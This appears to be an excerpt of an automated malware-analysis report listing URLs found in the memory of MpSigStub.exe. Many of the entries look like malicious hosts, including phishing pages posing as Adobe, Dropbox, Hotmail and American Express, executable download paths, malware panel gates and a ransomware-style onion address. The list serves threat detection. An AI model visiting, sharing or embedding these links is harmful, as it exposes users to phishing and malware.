Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://adf.ly
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://adobe-mark.byethost3.com/adobe-mail/pdf.php)
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://adoffy.alltuckedinathome.com:8080/led.js
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://ads.8866.org/
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads.cgi?
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?x_dp_id=
Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	String found in binary or memory: http://ads4.think-adz.com/
Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	String found in binary or memory: http://ads4.think-adz.com/xD
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://adsgo.zh-cn.cc/?
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://adsl.carpediem.fr/perl/invoc_oneway.pl?
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://adult-analsexadult.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://adult-fetishismsexadult.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://adult-xxx-sex-porn-playboy.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://adv-inc-net.com/trackingcode/tracker.html
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://advadmin.biz/tasks
Source: MpSigStub.exe, 00000023.00000003.6335125176.0000028BD6F68000.00000004.00000001.sdmp	String found in binary or memory: http://advancedcleaner.com
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://advancedtopmax.info/e/59034b87bbb71/59034b87bbbcc.bin
Source: MpSigStub.exe, 00000023.00000003.6267730911.0000028BD756A000.00000004.00000001.sdmp	String found in binary or memory: http://advgoogle.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	String found in binary or memory: http://adwpro.avelite.hop.clickbank.net/?mode=p
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://adyingtiger.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://aerytyre.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6341254844.0000028BD7D97000.00000004.00000001.sdmp	String found in binary or memory: http://aescripts.com
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: http://afkar.today/test_coming.training/w_f/
Source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp	String found in binary or memory: http://ag.ru
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://agent.wizztrakys.com/csdi/wizzmonetize/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://agentwarderprotector.info/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://ago2.co.kr/bbs/data/dir/note.png
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://agressor58.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://ahkscript.org
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://ahkscript.orgxw
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://ahmad-roni.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://aindonashi.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://ainsleywirefly.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://aircel3ghack.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://airsquirrels.com/
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://aitimatafb.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6328555317.0000028BD68B2000.00000004.00000001.sdmp	String found in binary or memory: http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://ajustek.com.br/pt-br/clicks.php?
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://akdoganevdeneve.net/wp-content/Panel/gate.php
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://aklick.info/d.php?date=
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://akrilikkapak.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://aksoni.myjino.ru/pn-g/xls.html)
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://akusajaboys.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://al-tasmem.ga/doc/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://alaihomestay.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://albaniaspace.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6328555317.0000028BD68B2000.00000004.00000001.sdmp	String found in binary or memory: http://alert-ca.com/counter1/fout.php
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: http://alexandrea-friesen16ka.ru.com/rocket.html
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: http://alfaportal.com/c
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://alfredo.myphotos.cc/scripts/view.asp
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://alhalm-now.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://alindaenua.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://aliyun.one
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://all-best-facts.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://allabouttopten.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://allankhall.com/templates/beez3/language/en-gb/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://allcomics4free.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://allinfree.net.info/youtube.xpi
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://allinfree.net/chrome.xml
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://allsexyinbox.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://allwallpaper3d.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp	String found in binary or memory: http://almasto.net/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://alrozaviation.com/oj
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://altaredlife.com/images/gp8/
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://altavista.com/favicon.ico
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://amazing-cars.org
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://ameganfoxhairstyle.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://americanexpress-secure.com
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://aminxfreedownload.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://ammun-ra.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://amr16pzcp03omerd.xyz/summer.gif
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://anarushitakute-tamaranai.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://anarushitakute-tamaranai.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://anazhthseis.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6270596186.0000028BD6DDB000.00000004.00000001.sdmp	String found in binary or memory: http://ancalog.tech/
Source: MpSigStub.exe, 00000023.00000003.6270596186.0000028BD6DDB000.00000004.00000001.sdmp	String found in binary or memory: http://ancalog.win/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://andanar.myjino.ru/black/pdfaluko/pdf/pdf/login.htm)
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://andrew08.testar.testforhost.com/ksinamisev.exe/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://andromulator.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://andsihowdint.ru/april/get.php?id=
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://anhchebongda.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://anherbal.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://animator.fetishismadultmovegal.com/pc/page/set_reg.php?af_num=&cuid=
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://animefrase.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://ankarahurdacim.com/wp-admin/3yk1/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://anmolboutique.com/osu/mgs/es/)
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://anomaniez.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6341254844.0000028BD7D97000.00000004.00000001.sdmp	String found in binary or memory: http://anonfile.xyz
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	String found in binary or memory: http://antispysolutions.com/?aid=
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	String found in binary or memory: http://antivirus-x.com/in.cgi?20
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://anty.freehostia.com/xxx/d
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://anty.freehostia.com/xxx/d5SOFTWARE
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://anxw.lolitasexfootube.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://aolopdephn.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg==
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: http://ap.gamezi.com/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://apee296.co.ke/tatiyv6824540/gescanntes-dokument/zahlungserinnerung
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	String found in binary or memory: http://api.aldtop.com
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://api.downloadmr.com/installer/
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://api.downloadmr.com/installer/xM
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://api.getwebcake.com/getwebcake/gc1
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify.org
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify.org/
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://api.media-tractor.com/track/?data=301
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://api.mswordexploit.com/
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://apivones.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://apk.downloadatoz.com/package/com.allinone.free.apk
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://apkfull2016.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://apofraxisavlonitis.gr/usswz/
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://apollo.thetheme99.com/wp-content/plugins/rrrrutd/mter/azure2020/azure2020/realm/117-crl.html
Source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp	String found in binary or memory: http://app.fileman.co.kr/app/Fileman.exe
Source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp	String found in binary or memory: http://app.fileman.co.kr/app/ver.ini
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://app.whenu.com/
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	String found in binary or memory: http://app.whenu.com/Offers
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: http://apps.bittorrent.com/cl_search/x6
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://apps.tangotoolbar.com
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://appstub.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://appswonder.info
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://appustories.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://apupdates-westeurope.cloudapp.net/Update/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://apy4.lolitasexfootube.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://araazman.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://arab-garden.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://aradiklarinburada.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://archifaktura.hu/nfxdutl.html
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://archiv.kl.com.ua/mssc.exe
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://arianarosefull.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://arifkacip.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://aristocrat.furniture/wp-content/themes/oceanwp/woocommerce/car
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: http://arizonaic.com
Source: MpSigStub.exe, 00000023.00000003.6279726781.0000028BD6C0C000.00000004.00000001.sdmp	String found in binary or memory: http://arpp0934.iespana.es
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://arthisoft.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://articlunik.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://artishollywoodbikini.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://asedownloadgate.com/safe_download/582369/AdsShow.exeg
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://ashevillefusion.com/obngakydblpj
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://asiafoodlog.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://asianhotxxx.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://asilsizhaber.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: http://aspeja.org/question/
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://aspx.qqus.net/wanmei/login.asp
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://aspx.vod38.com/
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://assistant.3721.com/help/uninstcns.htm
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://assistant.3721.com/instok
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://asuguglejancok.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://athasoftonlinestore.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	String found in binary or memory: http://ati.vn
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://attcarsint.cf/better/)
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://attechnolegal.com/wp-content/themes/attlc/img/404.htm
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://auglaizeseniorservices.com/lombrdia/lomardia.php
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://australia-505.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://autism-doctor.com.ua/openbizz.html)
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://auto-klad.ru/
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://auto.ie.searchforge.com/
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://auto.ie.searchforge.com/g
Source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmp	String found in binary or memory: http://auto.livesearchpro.com/response
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://auto.search.
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://autoescrowpay.com/s.php2
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://autoescrowpay.com/s.php2(MJV:%d
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://autonamlong.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://autothich.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	String found in binary or memory: http://avcute.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://averyfunnypage.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://avisocliente31.altervista.org/hotmail-atualizacao32
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://avnisevinc.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://avnpage.info/final3.php
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://avnpage.info/video/prenium.xpi
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://avnpage.info/watch/prenium.crx
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://avocat.com.br/imt/su/index.html
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://avocat360.fr/7-past-due-invoices/
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://ayanojou.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://azalea26.orange.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://azalea26.orange.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://b-compu.de/templates/conext/html/com_contact/contact/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6346900534.0000028BD6578000.00000004.00000001.sdmp	String found in binary or memory: http://b.reich.io/
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://b.wehelptoyou.com
Source: MpSigStub.exe, 00000023.00000003.6326325485.0000028BD642E000.00000004.00000001.sdmp	String found in binary or memory: http://ba3a.biz
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	String found in binary or memory: http://babelfish.altavista.com/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://babukq4e2p4wu4iq.onion
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://bachduongshops.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://bahaiat.net/vm/dropbox/)
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://bai2.tlbxsj.com/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://balaiomaranhao.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://balochirap.com/wp-content/pdf/payment_advice_pdf.php?email=
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://banatara.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://banatte.blogspot.com/
